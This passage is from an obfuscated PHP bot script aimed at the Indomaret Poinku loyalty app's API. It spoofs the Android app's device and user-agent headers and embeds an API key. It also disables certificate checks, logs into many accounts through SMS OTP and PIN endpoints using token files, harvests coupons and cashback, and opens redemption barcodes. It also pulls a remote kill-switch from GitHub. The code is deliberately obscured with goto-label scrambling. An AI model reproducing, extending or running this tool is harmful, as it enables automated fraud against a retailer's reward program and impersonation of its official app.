    print_r($AXlcQ); 
    goto s5Oik; 
    TvLG5: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto jpxDs; 
    FrKhl: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto Nnnau; 
    vAnNl: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto pydWi; 
    s5Oik: 
    return $ECuqv; 
    goto fFzQu; 
    K1k2q: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto vAnNl; 
    g3tvD: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto tS6k9; 
    wVWpD: 
    if (!$P7lm9) { 
      goto U6cgD; 
    } 
    goto PJL0a; 
    CxRKI: 
    Wjv2c: 
    goto OM7bT; 
    P4HbP: 
    $ECuqv = curl_exec($C6npe); 
    goto CnQG1; 
    fFzQu: 
  } 
  goto ke5o4; 
  snP1r: 
  $fM3_G++; 
  goto mxI0I; 
  VJfql: 
  $obc_G = str_replace("\xd", '', $wlJRC); 
  goto tOkg_; 
  c4vqT: 
  echo @zM6ic("green", "Barang Ke  : "); 
  goto IMPoy; 
  ZLXD4: 
  $QRhbE = explode("
", @file_get_contents("mytoken")); 
  goto hGBgv; 
  HHfsx: 
  echo "
"; 
  goto Bqv9L; 
  KS3CE: 
  $Jk9cx = E6Tpn("https://firebase-settings.crashlytics.com/spi/v2/platforms/android/gmp/1:998816605328:android:" . $aY0el . "/settings?instance=a291cbe808f666683ac167ea58393c709528e4f6&build_version=104&display_version=3.13.0&source=4", $aY0el); 
  goto fegp5; 
  xa14b: 
  if (!($jTEU0 < $S8W9D)) { 
    goto ZJW8G; 
  } 
  goto htdHd; 
  m_fbH: 
  @unlink("poin"); 
  goto dvyLA; 
  ipjRN: 
  echo @ZM6ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto yGhA1; 
  w2SfP: 
  $wdxee = @$owfHy["data"]["content"][$fM3_G]["exchangeStartDate"]; 
  goto J4Gc0; 
  tLkkX: 
  echo @zM6iC("yellow", "Pesan : "); 
  goto O90sh; 
  QxZ8E: 
  $xzAuu = @$owfHy["data"][0]["subDistrict"]["value"]; 
  goto PP6AJ; 
  zhwDs: 
  $upOL9 = g8PF2("https://edtsapp.indomaretpoinku.com/coupon/apix-1502-api/mobile/coupon-detail/" . $KOeAA, $aY0el, $GOXkU, $mlMLt); 
  goto xQPXT; 
  VRg4Z: 
  $yy9BI; 
  goto uHHvj; 
  NCHVJ: 
  goto fzpTX; 
  goto tw645; 
  xtpNl: 
  echo "
"; 
  goto cWc10; 
  TtX0M: 
  die; 
  goto Og2UZ; 
  qwB3A: 
  $U0YgX = str_replace("
", '', $zcN5u); 
  goto qmoFr; 
  UDy_g: 
  $yy9BI++; 
  goto udatF; 
  L0p_i: 
  die; 
  goto lLd10; 
  WK8g5: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto jVUfe; 
  OzVT8: 
  goto TA23H; 
  goto F2_6S; 
  wsUqo: 
  Zfg2N: 
  goto syFts; 
  HU3Jb: 
  $nb9cm = round(microtime(true) * 1000); 
  goto Nc01k; 
  BP2au: 
  $Ap1KM = json_decode($Jk9cx, true); 
  goto rjVqC; 
  hOWCA: 
  $tqWr2 = $zvt88[$yy9BI]; 
  goto XFSNO; 
  kVIcA: 
  $xp_1p = "indo.txt"; 
  goto liGR7; 
  pRS6N: 
  MGApE: 
  goto gW2bG; 
  jRg_C: 
  if (!($ZNU2M == "Cashback 2.500 Poin")) { 
    goto JgrhB; 
  } 
  goto J8NDx; 
  VMNR2: 
  $yI7qh = THHfS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-sms", $wDisp, $aY0el, $GOXkU); 
  goto cyzwh; 
  awgWa: 
  goto dDvxi; 
  goto mvQke; 
  TvO3v: 
  $S8W9D = trim(fgets(STDIN)); 
  goto QT3R_; 
  wgs69: 
  @unlink("poinhp.php"); 
  goto DTm09; 
  l1E44: 
  Gr9uI: 
  goto HpGT7; 
  gO1cU: 
  echo @ZM6IC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\xa"); 
  goto ybqqp; 
  boinS: 
  goto ebnNp; 
  goto OXnTa; 
  paChL: 
  echo "
"; 
  goto alk_K; 
  rX35n: 
  echo @Zm6IC("yellow", $Ti1xH); 
  goto wvrQK; 
  GGol7: 
  bvf0h: 
  goto OXStz; 
  VfGJN: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto w30J6; 
  aZLkI: 
  echo "Mulai Baris Ke : "; 
  goto yuVmv; 
  pwq0n: 
  echo "\xa"; 
  goto HFPOn; 
  lVk3T: 
  HzKRV: 
  goto o6KxG; 
  uDTHe: 
  if (!($fUekS == '')) { 
    goto DPq0p; 
  } 
  goto xVpOq; 
  OBRjg: 
  if ($odYyL == "Diskon Rp 25.000 Klik Indomaret") { 
    goto GuZf2; 
  } 
  goto eqV69; 
  GezTz: 
  echo "
"; 
  goto P08h4; 
  Rw10h: 
  @unlink("poinhp.php"); 
  goto OCtqu; 
  KPgnh: 
  echo "
"; 
  goto Q63qh; 
  MkOcE: 
  function NZKsP($lEbop, $wDisp = null) 
  { 
    goto aEZEi; 
    DU22g: 
    goto gdacC; 
    goto Hd0rq; 
    iQfFX: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto cVX8L; 
    aEZEi: 
    $C6npe = curl_init(); 
    goto Mqj18; 
    ItKyO: 
    print_r($AXlcQ); 
    goto wvUSS; 
    i4Sw6: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto v9gvo; 
    SGwn0: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto iQfFX; 
    cVX8L: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto Sg3zE; 
    wUWse: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto Os3SF; 
    v9gvo: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto e5iNR; 
    K_lTL: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto DU22g; 
    eGVbO: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto i66bh; 
    THQBH: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto K_lTL; 
    KIM2u: 
    return false; 
    goto xGE1I; 
    xGE1I: 
    gdacC: 
    goto nAs_F; 
    wvUSS: 
    return $ECuqv; 
    goto Vn7Ev; 
    i66bh: 
    if (!$P7lm9) { 
      goto ccQmb; 
    } 
    goto THQBH; 
    Sg3zE: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto E200N; 
    Hd0rq: 
    ccQmb: 
    goto KIM2u; 
    nbGoL: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto VZcSD; 
    E200N: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto wUWse; 
    Os3SF: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto i4Sw6; 
    e5iNR: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto nbGoL; 
    nAs_F: 
    $AXlcQ = json_decode($y7f11, true); 
    goto ItKyO; 
    VZcSD: 
    $ECuqv = curl_exec($C6npe); 
    goto eGVbO; 
    Mqj18: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto SGwn0; 
    Vn7Ev: 
  } 
  goto EXHsP; 
  O_aCK: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/configuration/apix-1502-api/mobile/skip-module/tr-skip-module", $aY0el, $GOXkU, $mlMLt); 
  goto qmWQR; 
  Ej7f9: 
  $yy9BI; 
  goto bkF1_; 
  Lv8Tl: 
  $wDisp = "{"data":[{"application":{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android P","os_version":"Android 9"},"core":{"event_name":"page_view","event_timestamp":" . $nb9cm . ","page_name":"splash","page_urlpath":""},"user":{"session_id":"" . $MXjqh . "","user_ip_address":"127.0.0.1"}}]}"; 
  goto ehPqu; 
  ahzgl: 
  $ZqwwP = @$owfHy["data"][0]["district"]["keyword"]; 
  goto txhvE; 
  Yu0OE: 
  $ldzeo = @$owfHy["data"][0]["subDistrict"]["subDistrict"]; 
  goto VTNC_; 
  x6Mwb: 
  $z5CDs = ["chat_id" => $Er7r7, "text" => $YXsOG]; 
  goto MoCCw; 
  rgtEh: 
  @unlink("poinhp.php"); 
  goto svrS2; 
  d32UI: 
  echo "
"; 
  goto xc_cJ; 
  jPmRn: 
  if (!($yy9BI < $DxrJr)) { 
    goto lcy0b; 
  } 
  goto g_wt9; 
  vr9Ss: 
  die; 
  goto END4X; 
  nRboz: 
  $jTEU0++; 
  goto OzVT8; 
  w59ij: 
  die; 
  goto ZG9Bt; 
  pbPWa: 
  echo "
"; 
  goto Vca23; 
  cG1au: 
  uNbUh: 
  goto Rvvfk; 
  Nz3YB: 
  $Jk9cx = g8PF2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/customer-address", $aY0el, $GOXkU, $mlMLt); 
  goto vunz9; 
  sXAqT: 
  $PQD51 = THhFS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist-by-phone-number", $wDisp, $aY0el, $GOXkU); 
  goto PoC5U; 
  wjnbp: 
  $mlMLt = $obc_G; 
  goto TZuPQ; 
  vI4fi: 
  $lPULW = $m0f8X; 
  goto VrunV; 
  q9myf: 
  die; 
  goto mOztK; 
  aWC11: 
  @unlink("poinhp.php"); 
  goto lzm9A; 
  oTqJ0: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto TSNoY; 
  At2qS: 
  echo @ZM6Ic("nevy", $wdxee); 
  goto ZnmJM; 
  OYd7F: 
  echo $BcbF3; 
  goto KM4hR; 
  U153z: 
  wCiUR: 
  goto dtY2y; 
  x9_Yt: 
  echo @Zm6iC("nevy", "Vertifikasi Handphone Anda => "); 
  goto SwawF; 
  wb7si: 
  echo @ZM6IC("yellow", "Tipe Stamp   : "); 
  goto bWo_S; 
  sVwTJ: 
  echo @zM6IC("green", "Barang Ke : "); 
  goto bQaVk; 
  JIZH5: 
  $v1ZMX = str_replace("\xd", '', $wPFxB); 
  goto FuYJt; 
  cXup3: 
  $yI7qh = THHFS("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/login-sms", $wDisp, $aY0el, $GOXkU); 
  goto FZJRs; 
  Ix3bF: 
  echo @zm6iC("red", $fM3_G); 
  goto bRraB; 
  ktRki: 
  @unlink("poinhp.php"); 
  goto hoCcO; 
  Cbxgb: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto jmVzd; 
  o4b0D: 
  if (!($aoIfK == '')) { 
    goto Jrt89; 
  } 
  goto GnHIS; 
  dqv_Y: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto l6uEH; 
  kSzig: 
  echo @ZM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto Vzbxs; 
  gZ9Oc: 
  $jU3Co = XOZb4(array(":"), $jze6k)[1]; 
  goto G0hLP; 
  zx7fS: 
  if (!($Pud0o == '')) { 
    goto QcsI1; 
  } 
  goto oaNa1; 
  ZP0KW: 
  $H1g60 = json_decode($a7K8a, true); 
  goto gl2qM; 
  Y5g0Z: 
  @unlink("poinhp.php"); 
  goto m3Qnm; 
  MZ50d: 
  $QRhbE = explode("
", @file_get_contents("forceclose")); 
  goto CNwmE; 
  GHojT: 
  goto MN2hd; 
  goto ECJVT; 
  Wmiu1: 
  echo "Sampai Baris Ke : "; 
  goto TnnPp; 
  Grsq5: 
  $sONlZ = str_replace("
", '', $rERzL); 
  goto rU5Ul; 
  UwOU9: 
  echo "
"; 
  goto ZVAC_; 
  jhlg7: 
  $wlJRC = xOZb4(array("|"), $wZnHP)[1]; 
  goto qwB3A; 
  LpVAo: 
  $YXsOG = @$Ap1KM["message"]; 
  goto tmuK2; 
  HvOW_: 
  goto xB5XS; 
  goto U153z; 
  emTau: 
  echo "
"; 
  goto FbFtW; 
  HeT1k: 
  echo "\xa"; 
  goto ETeBB; 
  xVpOq: 
  echo "\xa"; 
  goto bCOU4; 
  m5XjT: 
  $M1ADy = @$Ap1KM["data"]["id"]; 
  goto gPucm; 
  P08h4: 
  KDcja: 
  goto N_J9S; 
  dYic0: 
  echo @zm6IC("nevy", $kTI3Y); 
  goto uWkTX; 
  uLyGT: 
  echo @zm6iC("yellow", "Poin Akun Anda : "); 
  goto zkBq9; 
  v1dQ_: 
  $yy9BI++; 
  goto eR0Md; 
  uWZ9j: 
  echo @Zm6IC("nevy", "        AAMIIN "); 
  goto KT5E1; 
  DSkp1: 
  $Ipl73 = @$owfHy["data"][$qtgR3]["province"]; 
  goto hlmct; 
  euWkj: 
  $owfHy = json_decode($XTuz1, true); 
  goto URZe_; 
  TXD0c: 
  $zn5zd = $U0YgX; 
  goto emm3P; 
  k2aOv: 
  $S8W9D = "500"; 
  goto PT110; 
  QCDy5: 
  echo @zM6ic("nevy", "Akun Ke    : "); 
  goto vsRDz; 
  Pj3Iu: 
  if (!($yy9BI < $DxrJr)) { 
    goto fl6lv; 
  } 
  goto wS3V9; 
  GYE_P: 
  $upOL9 = g8PF2("https://edtsapp.indomaretpoinku.com/loyalty/apix-1502-api/mobile/stamps/me/buckets/" . $e0XZt . "/coupons?unpaged=true&sort=amount,asc&sort=name,asc", $aY0el, $GOXkU, $mlMLt); 
  goto naeAP; 
  OseGJ: 
  goto QRHsK; 
  goto rH2UI; 
  rYruL: 
  echo "
"; 
  goto rzYSV; 
  Nj1vn: 
  $wPFxB = XoZb4(array("|"), $tqWr2)[1]; 
  goto yLLb_; 
  X6t3o: 
  echo @zM6ic("nevy", $Bz8Et); 
  goto nwH7V; 
  R17tK: 
  if ($XDyMm == "1") { 
    goto Qcupn; 
  } 
  goto E1znw; 
  G9LDR: 
  $ZNU2M = @$Ap1KM["data"]["rewards"][0]["item"][0]["name"]; 
  goto E30x_; 
  B0rL2: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $WtCiL . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto kMeiR; 
  j2b0I: 
  $GOXkU = "Xiaomi Redmi 5 Plus"; 
  goto LNnsq; 
  JJWE6: 
  $mlMLt = $obc_G; 
  goto w1dsu; 
  GuIir: 
  echo "
"; 
  goto WG_Xq; 
  i2TQW: 
  echo @zM6IC("yellow", $hdCXp); 
  goto ZCLXd; 
  RdjY_: 
  $SD3v6 = @$owfHy["data"][0]["recipientEmail"]; 
  goto Z1NER; 
  Nb2VO: 
  $efQM2 = count($QRhbE) - 1; 
  goto ylkt4; 
  oEIK5: 
  if (!($yy9BI < $DxrJr)) { 
    goto RM7sw; 
  } 
  goto Fg3lZ; 
  aacu_: 
  Q7LGl: 
  goto UfbNl; 
  w3dkM: 
  echo @ZM6Ic("nevy", "Akun Ke    : "); 
  goto BcZc1; 
  HH90U: 
  $wDisp = "{"pinCode":"" . $earOL . ""}"; 
  goto KaAiL; 
  cyP0m: 
  echo "Mulai Baris Ke : "; 
  goto uhX7M; 
  dzZZq: 
  echo "\xa"; 
  goto oGZ6d; 
  TNlgG: 
  echo @ZM6IC("red", "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto hNNR3; 
  pn_Dn: 
  function A0mYl($lEbop, $wDisp = null, $N0ol8, $M1ADy, $aY0el, $GOXkU, $mlMLt) 
  { 
    goto jucPf; 
    ogGyW: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto dKjTs; 
    pU1UI: 
    $ruc3h[] = "user-agent: {"user":{"session_id":"" . $N0ol8 . "","user_id":" . $M1ADy . ","token":"" . $mlMLt . ""},"application":{"app_version":"3.12.0","device_class":"Phone","device_family":"" . $GOXkU . "","device_id":"" . $aY0el . "","os_name":"Android Q","os_version":"Android 10"},"marketing":{}}"; 
    goto W8QBs; 
    ZWvBa: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto wnfef; 
    on7JS: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto ArMAN; 
    l0E9D: 
    $ECuqv = curl_exec($C6npe); 
    goto ZWvBa; 
    SKpMI: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto on7JS; 
    oMles: 
    m0JYJ: 
    goto LU5Yh; 
    vB07q: 
    return $ECuqv; 
    goto Bqifi; 
    gsfrW: 
    IWbbf: 
    goto t_NGG; 
    wnfef: 
    if (!$P7lm9) { 
      goto m0JYJ; 
    } 
    goto SKpMI; 
    xIJhd: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto TbDde; 
    rIrhh: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto FNLyH; 
    TbDde: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto qkVzC; 
    dKjTs: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto rIrhh; 
    eoHEs: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto nQGX2; 
    FNLyH: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto eoHEs; 
    nQGX2: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto l0E9D; 
    ArMAN: 
    goto IWbbf; 
    goto oMles; 
    KZqlx: 
    $ruc3h[] = "x-requested-with: mypoin.indomaret.android"; 
    goto ogGyW; 
    IuuxL: 
    print_r($AXlcQ); 
    goto vB07q; 
    LU5Yh: 
    return false; 
    goto gsfrW; 
    qkVzC: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto nEKhC; 
    nEKhC: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto pU1UI; 
    W8QBs: 
    $ruc3h[] = "token: " . $mlMLt; 
    goto zKRnT; 
    t_NGG: 
    $AXlcQ = json_decode($y7f11, true); 
    goto IuuxL; 
    jucPf: 
    $C6npe = curl_init(); 
    goto xIJhd; 
    zKRnT: 
    $ruc3h[] = "content-type: application/json"; 
    goto KZqlx; 
    Bqifi: 
  } 
  goto q4tYJ; 
  x5btj: 
  function PDmoq($lEbop, $wDisp = null, $eOlDi, $tj7_x, $LgWaY) 
  { 
    goto jho4P; 
    Tc7TE: 
    $ruc3h[] = "accept-encoding: gzip"; 
    goto fL99F; 
    jho4P: 
    $C6npe = curl_init(); 
    goto yy2oZ; 
    xax8_: 
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0); 
    goto j3MUz; 
    j39iX: 
    if (!$P7lm9) { 
      goto bzxqT; 
    } 
    goto alEfv; 
    hMV97: 
    $ECuqv = curl_exec($C6npe); 
    goto YRdUX; 
    fL99F: 
    $ruc3h[] = "authorization: Bearer " . $LgWaY; 
    goto yzqFU; 
    D2n9z: 
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1); 
    goto BOaYA; 
    j3MUz: 
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp); 
    goto MuDdx; 
    MuDdx: 
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "indo.txt"); 
    goto G9lem; 
    fy5OD: 
    $ruc3h[] = "content-type: application/json; charset=UTF-8"; 
    goto nd3kx; 
    SRYLX: 
    return $ECuqv; 
    goto I32TJ; 
    yzqFU: 
    $ruc3h[] = "Host: edtsapp.indomaretpoinku.com"; 
    goto fy5OD; 
    jeubG: 
    bzxqT: 
    goto DLmvj; 
    xSifK: 
    IAgGn: 
    goto JuHty; 
    ICX2H: 
    $ruc3h[] = "{"app_version":"3.13.0","device_class":"Phone","device_family":"" . $tj7_x . "","device_id":"" . $eOlDi . "","os_name":"Android P","os_version":"Android 9"}"; 
    goto ZLYvs; 
    G9lem: 
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "indo.txt"); 
    goto hMV97; 
    BOaYA: 
    curl_setopt($C6npe, CURLOPT_POST, 1); 
    goto e7KCu; 
    xaDVg: 
    print_r($AXlcQ); 
    goto SRYLX; 
    ZLYvs: 
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true); 
    goto uR7Qf; 
    yy2oZ: 
    curl_setopt($C6npe, CURLOPT_URL, $lEbop); 
    goto FFEld; 
    YRdUX: 
    $P7lm9 = curl_getinfo($C6npe); 
    goto j39iX; 
    s_915: 
    goto IAgGn; 
    goto jeubG; 
    nd3kx: 
    $ruc3h[] = "key: ZWR0czIwMjE6MHBsbW9rbg=="; 
    goto ICX2H; 
    uR7Qf: 
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h); 
    goto xax8_; 
    e7KCu: 
    $ruc3h[] = "user-agent: okhttp/4.9.0"; 
    goto Tc7TE; 
    JuHty: 
    $AXlcQ = json_decode($y7f11, true); 
    goto xaDVg; 
    DLmvj: 
    return false; 
    goto xSifK; 
    alEfv: 
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto yZJjE; 
    yZJjE: 
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE)); 
    goto s_915; 
    FFEld: 
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true); 
    goto D2n9z; 
    I32TJ: 
  } 
  goto feVpL; 
  ApKLP: 
  $zn5zd = $U0YgX; 
  goto vZLPg; 
  BYxXO: 
  die; 
  goto TtX0M; 
  adT9K: 
  $wDisp = "{"appInstanceId":"" . $WYrgv . "","appVersion":"3.13.0","countryCode":"ID","analyticsUserProperties":{},"appId":"1:998816605328:android:" . $aY0el . "","platformVersion":"28","timeZone":"Asia\/Jakarta","sdkVersion":"21.0.1","packageName":"mypoin.indomaret.android","appInstanceIdToken":"" . $YYbml . "","languageCode":"id-ID","appBuild":"104"}"; 
  goto G6a4g; 
  gyLDE: 
  echo @Zm6iC("red", "\xa~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"); 
  goto gD4Hv; 
  E9ri5: 
  echo @zm6ic("yellow", " 15 . Cek Alamat Akun\xa"); 
  goto NSiv6; 
  Yekgm: 
  jjS8S: 
  goto yqfrR; 
  DeaiS: 
  $yy9BI++; 
  goto utUp0; 
  dg8Ba: 
  echo "Mulai Baris Ke : "; 
  goto hD5a6; 
  jGAxT: 
  echo shell_exec("xdg-open "https://barcode.tec-it.com/barcode.ashx?data="" . $QG8my . ""&code=Code128&multiplebarcodes=false&translate-esc=true&unit=Fit&dpi=96&imagetype=Gif&rotation=0&color=%23000000&bgcolor=%23ffffff&codepage=Default&qunit=Mm&quiet=10&hidehrt=False""); 
  goto VJNKS; 
  WG_Xq: 
  echo @zM6iC("nevy", "Sorry, This Script Has Been Removed By The Owner!!
"); 
  goto X9ZA_; 
  yZNY3: 
  echo @Zm6Ic("nevy", "Sorry, This Script Has Been Removed By The Owner!!"); 
  goto G_BNz; 
  bWo_S: 
  echo @zM6Ic("nevy", $KMaT7); 
  goto BV2ez; 
  NZ3S6: 
  if ($VW123 == "Diskon Rp 25.000 Klik Indomaret") { 
    goto jj5YO; 
  } 
  goto OBRjg; 
  gQD3z: 
  yzn_p: 
  goto w7BAw; 
  Xpi4j: 
  echo @zM6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto c0XOv; 
  ZiZwm: 
  yCYD7: 
  goto u8rId; 
  UQ9UB: 
  ywALj: 
  goto ZJ1DV; 
  b5LV5: 
  print_r($zcN5u); 
  goto mOFOa; 
  bvGw_: 
  $Jk9cx = G8Pf2("https://edtsapp.indomaretpoinku.com/customer/apix-1502-api/mobile/detail-customer-origin", $aY0el, $GOXkU, $mlMLt); 
  goto J75af; 
  Wbgjl: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto xxJsw; 
  zPNPk: 
  goto BINZC; 
  goto YcLmy; 
  qJxBN: 
  $w5ulg = str_replace("\xd", '', $TvVlh); 
  goto MCqL1; 
  rSmA9: 
  $mlMLt = $obc_G; 
  goto FeWz5; 
  Dq8Ho: 
  goto bI4pG; 
  goto G8Xed; 
  LOrcr: 
  die; 
  goto C3pq7; 
  hikDr: 
  $p4iky = @$Ap1KM["data"]["memberId"]; 
  goto pqxuM; 
  Uv0u9: 
  goto MxwyD; 
  goto WWbCv; 
  VYfqN: 
  $zcN5u = Xozb4(array("|"), $tqWr2)[0]; 
  goto xkj3T; 
  NN7jm: 
  echo "
"; 
  goto wk8VN; 
  bOrHs: 
  echo $BcbF3; 
  goto iB1bd; 
  YfMdd: 
  $yy9BI++; 
  goto GJQG1; 
  LuR4F: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto D9X9V; 
  XQkYc: 
  $dQ8Tp = trim(fgets(STDIN)); 
  goto MRDOh; 
  Dsy8e: 
  goto IDXKw; 
  goto Tq1Up; 
  FHEiz: 
  echo "\xa"; 
  goto ytCGQ; 
  dVT5w: 
  echo @zm6iC("yellow", "| WA 082176358295 \xa"); 
  goto IUtYn; 
  D6ZaQ: 
  $phWC6 = G66lT("https://edtsapp.indomaretpoinku.com/login/apix-1502-api/open/pin/is-pin-exist", $wDisp, $aY0el); 
  goto Y6Wfi; 
  FNHI1: 
  echo @ZM6IC("yellow", "Pesan       : "); 
  goto NzfwF; 
  QKhZy: 
  if (!($fUekS == '')) { 
    goto BIMja; 
  } 
  goto oHBPa; 
  XGQ70: 
  echo @zM6iC("yellow", "Keyword    : "); 
  goto b944Q; 
  JDhRT: 
  die; 
  goto lIn_S; 
  Ebtyv: 
  k6OVh: 
  goto NTLhy; 
  la6k6: 
  echo @ZM6Ic("yellow", "| WA 082176358295 
"); 
  goto sfztk; 
  fAd2I: 
  echo @zM6iC("yellow", "
OTP ANDA SALAH, SILAHKAN INPUT YANG BARU!!
\xa"); 
  goto KesBR; 
  af96j: 
  $wd9cN = date("d-m-Y | H:i:s"); 
  goto d7TEi; 
  N2CUG: 
  if (!($yy9BI < $DxrJr)) { 
    goto KfEmL; 
  } 
  goto lvnW1; 
  aSxUw: 
  $qtgR3; 
  goto RufHo; 
  NoCuK: 
  echo "
"; 
  goto OG9eF; 
  fvW7K: 
  $GOXkU = $w5ulg; 
  goto j96R4; 
  yAt0D: 
  echo "
"; 
  goto L_E1x; 
  rfy1i: 
  IiPZc: 
  goto awgWa; 
  J3y2E: 
  sSphg: 
  goto qd5SF; 
  bSVki: 
  echo @ZM6iC("green", "Masukkan OTP Anda : "); 
  goto Nwhy1; 
  MR7en: 
  $yy9BI++; 
  goto HzylY; 
  oqEpm: 
  echo $yy9BI . ". "; 
  goto TMn1K; 
  LAo4A: 
  $Pud0o = trim(file_get_contents("https://raw.githubusercontent.com/csaojkcsajcsjnjkscanjkncjkslnj/adfadfadvsgdfggfsgsgfsaf/main/makin")); 
  goto oX0a1; 
  pw7cq: 
  yj7_K: 
  goto rKNAf; 
  Qd04P: 
  $QRhbE = explode("\xa", @file_get_contents("forceclose")); 
  goto LqvKX; 
  bFP1u: 
  $Ap1KM = json_decode($ofEkP, true); 
  goto T96NA; 
  uGUIH: 
  $yy9BI; 
  goto qU51_; 
  jixow: 
  $XDyMm = @$Ap1KM["data"]["balance"]; 
  goto z_0dp; 
  p1Pvo: 
  echo "
"; 
  goto zAu8b; 
  UKbD6: 
  if (!($zcN5u == '')) { 
    goto JkuZC; 
  } 
  goto N_rB_; 
  oLXie: 
  if (!($zcN5u == '')) { 
    goto hRDFl; 
  } 
  goto eulTp; 
  NzfwF: 
  echo @zM6IC("nevy", $ABmxY); 
  goto LppAG; 
  lhi8z: 
  echo @ZM6IC("yellow", "Build By FERDY RAMADHAN "); 
  goto ICV3b; 
  k3DWO: 
  echo @zm6IC("nevy", $ZNU2M); 
  goto zA4ox; 
  nsRvn: 
  $QRhbE = explode("\xa", @file_get_contents("mytoken")); 
  goto HVxni; 
  Qj0f7: 
  $S8W9D = trim(fgets(STDIN)); 
  goto jYqv2; 
  Lb03I: 
  $nb9cm = round(microtime(true) * 1000); 
  goto s332j; 
  Ky97d: 
  echo $yy9BI . ". "; 
  goto DjtjH; 
  NKzpF: 
  $u35jw = count($m0f8X) - 1; 
  goto v8qnX; 
  QLuqS: 
  echo @ZM6iC("nevy", $M1ADy); 
  goto Mfr2v; 
  J4JQ1: 
  goto HzKRV; 
  goto avNKg; 
  Ddz2F: 
  echo "
"; 
  goto V2WUN; 
  Oy0iQ: 
  echo "\xa"; 
  goto kVIcA; 
  hnMXZ: 
  echo "\xa"; 
  goto b3huw; 
  gy03D: 
  echo "
"; 
  goto yQ_GB; 
  O0Oil: 
  die; 
  goto Ul8XG; 
  C0X4e: 
  echo @zm6Ic("green", "Ada Ayam... Yuk Pecahin !!"); 
  goto dzZZq; 
  RbmA4: 
  $w5ulg = str_replace("
", '', $TvVlh); 
  goto C7yJd; 
  Sk1M_: 
  echo @zM6IC("nevy", "        AAMIIN "); 
  goto owgsu; 
  I5RSt: 
  $C2XmN = trim(fgets(STDIN)); 
  goto xtpNl; 
  INRDE: 
